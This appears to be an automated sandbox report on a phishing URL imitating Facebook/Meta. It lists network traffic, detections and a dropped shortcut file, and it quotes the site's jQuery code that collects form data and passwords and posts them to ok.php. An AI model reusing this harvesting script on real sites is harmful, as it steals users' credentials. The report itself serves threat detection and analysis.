104.21.90.128	unknown	United States	13335	CLOUDFLARENETUS	false
157.240.251.9	unknown	United States	32934	FACEBOOKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.156.167	leo.xlsir.click	United States	13335	CLOUDFLARENETUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
157.240.252.13	scontent.xx.fbcdn.net	United States	32934	FACEBOOKUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448165
Start date and time:	2024-05-28 00:34:25 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://leo.xlsir.click/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@23/39@19/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://leo.xlsir.click/home.php Browse: https://leo.xlsir.click/meta-community-standard/buiness

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.46, 108.177.15.84, 34.104.35.123, 142.250.186.138, 142.250.185.99, 13.85.23.86, 87.248.205.0, 192.229.221.95, 52.165.164.15, 142.250.185.234, 172.217.18.10, 172.217.16.202, 142.250.185.138, 142.250.185.74, 142.250.186.42, 142.250.186.74, 142.250.184.202, 142.250.185.170, 142.250.181.234, 216.58.212.138, 142.250.185.106, 216.58.206.74, 142.250.185.202, 142.250.184.234, 216.58.206.42, 20.166.126.56, 20.12.23.50, 20.114.59.183, 172.217.16.195, 178.79.238.0
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: https://leo.xlsir.click/

Input	Output
URL: https://leo.xlsir.click/home.php Model: gpt-4o	```json { "riskscore": 7, "reasons": "The code captures and sends user input, including passwords, via an AJAX request to 'ok.php'. This behavior is typical of phishing sites that collect sensitive information. The redirection to 'confirm.php' with an ID parameter further suggests potential phishing activity." }
$('.pass-close').click(function() { $('.pass-modal').removeClass('active'); }) $('.info-form').submit(function(e) { e.preventDefault(); $('.pass-modal').addClass('active'); }) $('.pass-form').submit(function(e) { e.preventDefault(); if (!$('#pass1').val().trim()) { $('#pass1').val($('#pass2').val()); $('.password-correct').show(); } else { data = $('form.info-form').serialize(); data += `&pass1=${$('#pass1').val().trim()}&pass2=${$('#pass2').val().trim()}&step=1` $.ajax({ url: 'ok.php', method: 'post', data: data }).done(function(id) { window.location.href = 'confirm.php?id=' + id }) } })

URL: https://leo.xlsir.click/home.php Model: gpt-4o

```json
{
  "riskscore": 7,
  "reasons": "The code captures and sends user input, including passwords, via an AJAX request to 'ok.php'. This behavior is typical of phishing sites that collect sensitive information. The redirection to 'confirm.php' with an ID parameter further suggests potential phishing activity."
}

$('.pass-close').click(function() {
                    $('.pass-modal').removeClass('active');
                })

                $('.info-form').submit(function(e) {
                    e.preventDefault();
                    $('.pass-modal').addClass('active');

                })

                $('.pass-form').submit(function(e) {
                    e.preventDefault();

                    if (!$('#pass1').val().trim()) {
                        $('#pass1').val($('#pass2').val());
                        $('.password-correct').show();
                    } else {
                        data = $('form.info-form').serialize();
                        data += `&pass1=${$('#pass1').val().trim()}&pass2=${$('#pass2').val().trim()}&step=1`
                        $.ajax({
                            url: 'ok.php',
                            method: 'post',
                            data: data
                        }).done(function(id) {
                            window.location.href = 'confirm.php?id=' + id
                        })
                    }
                })

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon May 27 21:35:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.983004116818964
Encrypted:	false
SSDEEP:	48:8IdWTS+JHcidAKZdA19ehwiZUklqehYgy+3:85jgfgy
MD5:	E9C7991F2958A21E2BBFAB950D345D89
SHA1:	45B19BA6DC8646034D5530841987DEC5EF478990
SHA-256:	0C8D0FD5F5E7BD7F47D675F55FAE1DBB3D0329B77B20B57E6A4FA8B5DDBC4DB3
SHA-512:	DA6040B4B903A727E411AA2DF18EE129E33203D63AE462ECC53DEC1BBBE93DB102CD9B8D879EAEE7B72CEE875EEA51F6DB05F93C00B4E3E6E7208448CA5CBD1F
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....5.#....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Xd.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Xd.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Xd.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Xd............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Xg............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Source: https://leo.xlsir.click/	Avira URL Cloud: detection malicious, Label: phishing
Source: https://leo.xlsir.click/	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Source: https://leo.xlsir.click/images/logo.meta.png	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/static/media/background.1f85623d06212e6d3ed4.png	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/static/js/main.a3de5fef.js	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/images/banner1.png	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/css/main.02.css	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://leo.xlsir.click/images%20/logo.meta.png	Avira URL Cloud: Label: phishing

Source: https://leo.xlsir.click/	Matcher: Template: facebook matched with high similarity
Source: https://leo.xlsir.click/home.php	Matcher: Template: facebook matched with high similarity

Source: global traffic	TCP traffic: 192.168.2.5:62567 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:65058 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.244.127
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/main.02.css HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://leo.xlsir.click/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/banner1.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://leo.xlsir.clicksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://leo.xlsir.click/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/banner1.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /home.php HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://leo.xlsir.clicksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://leo.xlsir.click/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/logo.meta.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/home.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images%20/logo.meta.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/home.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /images/logo.meta.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/js/main.a3de5fef.js HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://leo.xlsir.click/home.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /static/media/background.1f85623d06212e6d3ed4.png HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/css/main.02.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /meta-community-standard/buiness HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: leo.xlsir.clickConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://leo.xlsir.click/meta-community-standard/buinessAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2024 00:35:12.704071045 CEST	53	52961	1.1.1.1	192.168.2.5
May 28, 2024 00:35:12.710293055 CEST	53	50482	1.1.1.1	192.168.2.5
May 28, 2024 00:35:13.707813978 CEST	53	53227	1.1.1.1	192.168.2.5
May 28, 2024 00:35:14.373543024 CEST	63519	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:14.373816013 CEST	61658	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:14.385490894 CEST	53	63519	1.1.1.1	192.168.2.5
May 28, 2024 00:35:14.546961069 CEST	53	61658	1.1.1.1	192.168.2.5
May 28, 2024 00:35:16.078620911 CEST	50925	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:16.079207897 CEST	65073	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:16.084101915 CEST	53	56368	1.1.1.1	192.168.2.5
May 28, 2024 00:35:16.087080956 CEST	53	50925	1.1.1.1	192.168.2.5
May 28, 2024 00:35:16.088409901 CEST	53	65073	1.1.1.1	192.168.2.5
May 28, 2024 00:35:16.613787889 CEST	62426	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:16.617078066 CEST	52526	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:17.491502047 CEST	53	62426	1.1.1.1	192.168.2.5
May 28, 2024 00:35:17.491786957 CEST	53	52526	1.1.1.1	192.168.2.5
May 28, 2024 00:35:17.796394110 CEST	53	54036	1.1.1.1	192.168.2.5
May 28, 2024 00:35:17.815443039 CEST	56879	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:17.817862988 CEST	60241	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:17.860368013 CEST	53	56879	1.1.1.1	192.168.2.5
May 28, 2024 00:35:18.230561018 CEST	59011	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:18.230561018 CEST	52191	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:18.240505934 CEST	53	59011	1.1.1.1	192.168.2.5
May 28, 2024 00:35:18.240542889 CEST	53	52191	1.1.1.1	192.168.2.5
May 28, 2024 00:35:18.378423929 CEST	53	60241	1.1.1.1	192.168.2.5
May 28, 2024 00:35:19.567351103 CEST	61695	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:19.567708015 CEST	53959	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:19.574250937 CEST	53	61695	1.1.1.1	192.168.2.5
May 28, 2024 00:35:19.574568033 CEST	53	53959	1.1.1.1	192.168.2.5
May 28, 2024 00:35:29.178966999 CEST	49347	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:29.179359913 CEST	57254	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:29.186305046 CEST	53	57254	1.1.1.1	192.168.2.5
May 28, 2024 00:35:29.186527967 CEST	53	49347	1.1.1.1	192.168.2.5
May 28, 2024 00:35:31.048985958 CEST	53	63988	1.1.1.1	192.168.2.5
May 28, 2024 00:35:31.543683052 CEST	61868	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:31.544049978 CEST	52427	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:31.550817966 CEST	53	61868	1.1.1.1	192.168.2.5
May 28, 2024 00:35:31.551135063 CEST	53	52427	1.1.1.1	192.168.2.5
May 28, 2024 00:35:32.091599941 CEST	53	53869	1.1.1.1	192.168.2.5
May 28, 2024 00:35:35.087639093 CEST	53	56282	1.1.1.1	192.168.2.5
May 28, 2024 00:35:44.947284937 CEST	53	55682	162.159.36.2	192.168.2.5
May 28, 2024 00:35:45.417748928 CEST	59698	53	192.168.2.5	1.1.1.1
May 28, 2024 00:35:45.426095963 CEST	53	59698	1.1.1.1	192.168.2.5
May 28, 2024 00:36:16.663213968 CEST	57106	53	192.168.2.5	1.1.1.1
May 28, 2024 00:36:16.670308113 CEST	53	57106	1.1.1.1	192.168.2.5
May 28, 2024 00:36:31.550654888 CEST	55627	53	192.168.2.5	1.1.1.1
May 28, 2024 00:36:31.559808016 CEST	53	55627	1.1.1.1	192.168.2.5

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 28, 2024 00:35:14.547086954 CEST	192.168.2.5	1.1.1.1	c22f	(Port unreachable)	Destination Unreachable
May 28, 2024 00:35:18.378498077 CEST	192.168.2.5	1.1.1.1	c22f	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-05-27 22:35:14 UTC	658	OUT	GET / HTTP/1.1 Host: leo.xlsir.click Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-27 22:35:16 UTC	717	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 22:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding x-powered-by: DLEMP x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJt1%2Br8PjOn99c3jgdUys1VVO7qTfICHoFmNTXSxSRwX5aMa%2BNftHnMSon680zkzzax8vik302y%2BX4jrNN9vxwkBTvtH5j7E5T%2Fh6Um37GALTlwEipwvleRk%2FSKhCv3txso%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a97a1a9c9172b9-EWR alt-svc: h3=":443"; ma=86400
